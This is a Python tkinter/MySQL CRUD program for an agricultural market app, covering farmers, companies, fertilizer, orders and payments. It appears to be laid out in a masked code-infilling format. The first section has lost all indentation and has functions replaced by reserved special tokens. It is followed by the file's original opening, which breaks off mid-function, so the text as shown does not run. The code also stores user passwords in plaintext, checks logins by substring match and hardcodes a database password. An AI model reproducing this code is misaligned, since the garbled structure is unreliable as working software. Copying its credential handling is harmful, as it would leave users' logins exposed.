val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',
'farmer mail: ', 'farmer locality: ', 'farmer address: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))
l.place(x=100, y=300)
search_farmer()
def company():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_company)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_company)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_company)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_company)
Button.place(x=410, y=50)
view_company()
def view_company():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),
xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('c_id', text='Company Id')
table.heading('c_name', text='Company Name')
table.heading('c_address', text='Company Address')
table['show'] = 'headings'
table.column('c_id', width=100)
table.pack()
cur.execute('SELECT * FROM company;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
def insert_company():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company_id', font=('Times new roman', 20), bg
='white')
label.place(x=50, y=10)
label = Label(root, text='Company_name', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Company_address', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=110)
e3.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_company_command)
Button.place(x=400, y=400)
def insert_company_command():
try:
if len(e1.get()) > 3:
invalid('company')
else:
sql = 'INSERT INTO company values(%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get()
cur.executemany(sql, [vals])
db.commit()
company()
except:
insert_company()
def delete_company():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Id:', font=('Times new roman', 20),
bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_company_command)
Button.place(x=400, y=400)
def delete_company_command():
try:
sql = 'DELETE FROM company WHERE c_id=%s;'
cur.execute(sql, [int(e1.get())])
db.commit()
company()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_c():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM company WHERE c_id=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Company_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Company_name', font=('Times new roman',
20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Company_address', font=('Times new roman',
20), bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=110)
e3.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_c)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_company()
<|reserved_special_token_0|>
def search_company():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Id:', font=('Times new roman', 20),
bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_c)
Button.place(x=400, y=400)
def search_c():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM company WHERE c_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=company
)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['company id: ', 'company name: ', 'company address: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Company Id', font=('times new roman', 15)
)
l.place(x=100, y=300)
search_company()
def fertilizer():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertilizer Table', font=('Times new roman',
15), bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_fer)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_fer)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_fer)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_fer)
Button.place(x=410, y=50)
view_fer()
def view_fer():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',
'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.
set, yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('fe_formula', text='Fertilizer Formula')
table.heading('fe_name', text='Fertilizer name')
table.heading('fe_content', text='Fertilizer content')
table.heading('fe_price', text='Fertilizer price')
table.heading('company_id', text='Company_id')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM fertilizer;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_fer_command():
try:
sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
fertilizer()
except:
insert_fer()
def delete_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertilizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_fer_command)
Button.place(x=400, y=400)
def delete_fer_command():
try:
sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'
cur.execute(sql, [e1.get()])
db.commit()
fertilizer()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
def update_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertlizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)
Button.place(x=300, y=400)
def update_fe():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Fertlizer formula', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=10)
label = Label(root, text='Fertlizer name', font=('Times new roman',
20), bg='white')
label.place(x=50, y=60)
label = Label(root, text='Fertlizer content', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Fertlizer price', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='comapny_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
e4 = Entry(root)
e5 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3, e4, e5, e6]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_fe)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_fer()
<|reserved_special_token_0|>
def search_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertlizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_fe)
Button.place(x=400, y=400)
def search_fe():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=
fertilizer)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['fertilizer formula: ', 'fertilizer name: ',
'fertilizer content: ', 'fertilizer price: ', 'company_id: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Fertilizer formula', font=(
'times new roman', 15))
l.place(x=100, y=300)
search_fer()
def orders():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Orders Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_ord)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_ord)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_ord)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_ord)
Button.place(x=410, y=50)
view_ord()
def view_ord():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',
'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand
=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('or_id', text='Order Id')
table.heading('or_date', text='Order Date')
table.heading('or_fid', text='Ordered Farmer Id')
table.heading('or_formula', text='Order (item)formula')
table.heading('or_to', text='Order to')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM orders;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_ord():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=10)
label = Label(root, text='Order date', font=('Times new roman', 20), bg
='white')
label.place(x=50, y=60)
label = Label(root, text='Order FID', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=110)
label = Label(root, text='Order formula', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=160)
label = Label(root, text='Order to', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e2.insert(0, datetime.now())
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_ord_command)
Button.place(x=400, y=400)
def insert_ord_command():
try:
sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
orders()
except:
insert_ord()
def delete_ord():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
'tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_ord_command)
Button.place(x=400, y=400)
def delete_ord_command():
try:
sql = 'DELETE FROM orders WHERE or_id=%s;'
cur.execute(sql, [e1.get()])
db.commit()
orders()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
def update_ord():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
'tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_or)
Button.place(x=300, y=400)
def update_or():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM orders WHERE or_id=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Order Id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Order Date', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=60)
label = Label(root, text='Order f_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Order formula', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='Order to', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
e4 = Entry(root)
e5 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3, e4, e5, e6]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_ord)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Order_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_ord()
def update_command_ord():
sql = (
'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'
)
vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()
cur.executemany(sql, [vals])
db.commit()
orders()
def search_ord():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
'tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_or)
Button.place(x=400, y=400)
def search_or():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM orders WHERE or_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['order Id: ', 'Order date: ', 'Order fid: ',
'Order formula: ', 'order to: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid order id', font=('times new roman', 15))
l.place(x=100, y=300)
search_ord()
def payment():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Payment Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_pay)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_pay)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_pay)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_pay)
Button.place(x=410, y=50)
view_pay()
def view_pay():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('trans_id', text='Transaction Id')
table.heading('p_f_id', text='Farmer Id')
table.heading('p_date', text='Payment Date')
table.heading('p_amount', text='Amount')
table.heading('p_method', text='Payment Method')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM payment;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_pay():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Transaction farmer id', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=60)
label = Label(root, text='Transaction date', font=('Times new roman',
20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Transaction amount', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='Transaction method', font=('Times new roman',
20), bg='white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e3.insert(0, datetime.now())
e4.place(x=350, y=160)
e5 = StringVar(root)
e5.set('Debit card')
w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')
w.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_pay_command)
Button.place(x=400, y=400)
def insert_pay_command():
try:
sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
payment()
except:
insert_pay()
def delete_pay():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id:', font=('Times new roman', 20
), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_pay_command)
Button.place(x=400, y=400)
def delete_pay_command():
try:
sql = 'DELETE FROM payment WHERE trans_id=%s;'
cur.execute(sql, [e1.get()])
db.commit()
payment()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
<|reserved_special_token_0|>
def search_pay():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id:', font=('Times new roman', 20
), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_pa)
Button.place(x=400, y=400)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#! /usr/bin/python3
import pprint
import tkinter as tk
from tkinter import messagebox
from PIL import Image
from tkinter import *
from prettytable import PrettyTable
import ttk
import os
import subprocess
import mysql.connector
from datetime import datetime
import time
db=mysql.connector.connect(host='localhost',user='root',passwd='PASSWORD',database='DATABASENAME')
cur=db.cursor()
root=Tk()
root.title("WELCOME TO AGRI MARKET")
#stored procedure
"""
DELIMITER $$
CREATE PROCEDURE getMonth(
IN month VARCHAR(2))
BEGIN
SELECT * FROM payment
WHERE p_date LIKE CONCAT('____-',month,'%');
END$$
DELIMITER ;
"""
T1,T2,T3=0,0,0
def First_page(root):
global T1,T2,T3
frame=Frame(root,height=500,width=800,bg='ivory')
frame.pack()
label=Label(root,text='WELCOME TO AGRI MARKET',font=('Times new roman',25))
label.place(x=200,y=50)
button=Button(root,text='LogIn',font=('times new roman',20),command=check_pass,bg='green')
button.place(x=350,y=350)
L1 = tk.Label(root, text="Username", font=("Arial Bold", 15), bg='ivory')
L1.place(x=150, y=200)
T1 = tk.Entry(root, width = 30, bd = 5)
T1.place(x=280, y=200)
L2 = tk.Label(root, text="Password", font=("Arial Bold", 15), bg='ivory')
L2.place(x=150, y=250)
T2 = tk.Entry(root, width = 30, show='*', bd = 5)
T2.place(x=280, y=250)
reg_button=Button(root,text='Register',font=("Arial Bold",15),bg='blue',command=create_pass)
reg_button.place(x=340,y=400)
def check_pass():
global root,T1,T2,T3
try:
with open('password.txt','r')as f:
lines=f.read()
if T1.get()+'='+T2.get() in lines and T1.get()!='' and T2.get()!='':
entity_page()
else:
label=Label(root,text='Invalid username or password.Try again',font=('times new roman',15))
label.place(x=200,y=100)
except:
label=Label(root,text='Invalid username or password.Try again',font=('times new roman',15))
label.place(x=200,y=100)
def create_pass():
global root,T1,T2,T3
#to clean up previous window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='ivory')
label.place(x=0,y=0)
#this window
L1 = tk.Label(root, text="Username", font=("Arial Bold", 15), bg='ivory')
L1.place(x=150, y=200)
T1 = tk.Entry(root, width = 30, bd = 5)
T1.place(x=380, y=200)
L2 = tk.Label(root, text="Password", font=("Arial Bold", 15), bg='ivory')
L2.place(x=150, y=250)
T2 = tk.Entry(root, width = 30, show='*', bd = 5)
T2.place(x=380, y=250)
L2 = tk.Label(root, text="Confirm Password", font=("Arial Bold", 15), bg='ivory')
L2.place(x=150, y=300)
T3 = tk.Entry(root, width = 30, show='*', bd = 5)
T3.place(x=380, y=300)
reg_button=Button(root,text='Done',font=("Arial Bold",15),bg='blue',command=add_pass)
reg_button.place(x=440,y=400)
def add_pass():
global root,T1,T2,T3
if T2.get()!=T3.get():
label=Label(root,text='Incorrect Password. Enter again',font=('times new roman',20))
label.place(x=100,y=100)
else:
try:
with open('password.txt','r')as f:
data=f.read()
with open('password.txt','w')as f:
f.write(data+'\n')
f.write(T1.get()+'='+T2.get())
entity_page()
except:
with open('password.txt','w')as f:
f.write(T1.get()+'='+T2.get())
entity_page()
def entity_page():
global root
#cleaning previous window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='ivory')
label.place(x=0,y=0)
#this window
label=Label(root,text='WELCOME TO AGRI MARKET ',font=('Times new roman',20),bg='blue')
label.place(x=200,y=20)
label=Label(root,text='Choose the Entity ',font=('Times new roman',20),bg='white')
label.place(x=250,y=100)
Button = tk.Button(root, text="Farmers", font=("Arial", 15),command=farmer)
Button.place(x=100, y=150+25)
Button = tk.Button(root, text="Company", font=("Arial", 15),command=company)
Button.place(x=300, y=150+25)
Button = tk.Button(root, text="Fertilizer", font=("Arial", 15),command=fertilizer)
Button.place(x=500, y=150+25)
Button = tk.Button(root, text="Order", font=("Arial", 15),command=orders)
Button.place(x=200, y=300+25)
Button = tk.Button(root, text="Payment", font=("Arial", 15),command=payment)
Button.place(x=400, y=300+25)
Button = tk.Button(root, text="GET BOOKING HISTORY", font=("Arial", 15),command=history)
Button.place(x=200, y=400+25)
#history
def history():
global root,cur,db
#clean previous window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
cur.execute("CALL getMonth(%s);",[datetime.today().strftime("%m")])
data=cur.fetchall()
label=Label(root,text="The Transaction History of this month",font=("Arial",15))
label.place(x=200,y=20)
button=Button(root,text='BACK',command=entity_page)
button.place(x=20,y=20)
frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
frame.place(x=10,y=100,width=750,height=400)
x_scroll=Scrollbar(frame,orient=HORIZONTAL)
y_scroll=Scrollbar(frame,orient=VERTICAL)
table=ttk.Treeview(frame,columns=("trans_id",'p_f_id','p_date','p_amount','p_method'),xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM,fill=X)
y_scroll.pack(side=RIGHT,fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('trans_id',text="Transaction Id")
table.heading('p_f_id',text="Farmer Id")
table.heading('p_date',text="Payment Date")
table.heading('p_amount',text="Amount")
table.heading('p_method',text="Payment Method")
#table.heading('f_address',text="Farmer Address")
table['show']='headings'
#table.column("f_id",width=100)
table.pack()
#cur.execute("SELECT * FROM payment;")
#data =cur.fetchall()
#db.commit()
if len(data)!=0:
for row in data:
table.insert('',END,values=row)
db.close()
db=mysql.connector.connect(host='localhost',user='root',passwd='bhushi',database='farmer_app')
cur=db.cursor()
#farmer page
def farmer():
global root
#clean previous window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Farmer Table',font=('Times new roman',15),bg='white')
label.place(x=350,y=10)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text="Insert", font=("Arial", 15),command=insert_farmer)
Button.place(x=110, y=50)
Button = tk.Button(root, text="Delete", font=("Arial", 15),command=delete_farmer)
Button.place(x=210, y=50)
Button = tk.Button(root, text="Update", font=("Arial", 15),command=update_farmer)
Button.place(x=310, y=50)
Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_farmer)
Button.place(x=410, y=50)
view_farmer()
def view_farmer():
frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
frame.place(x=10,y=100,width=750,height=400)
x_scroll=Scrollbar(frame,orient=HORIZONTAL)
y_scroll=Scrollbar(frame,orient=VERTICAL)
table=ttk.Treeview(frame,columns=("f_id",'f_name','f_phone','f_mail','f_locality','f_address'),xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM,fill=X)
y_scroll.pack(side=RIGHT,fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('f_id',text="Farmer Id")
table.heading('f_name',text="Farmer Name")
table.heading('f_phone',text="Farmer Phone")
table.heading('f_mail',text="Farmer Mail")
table.heading('f_locality',text="Farmer Locality")
table.heading('f_address',text="Farmer Address")
table['show']='headings'
table.column("f_id",width=100)
table.pack()
cur.execute("SELECT * FROM farmer;")
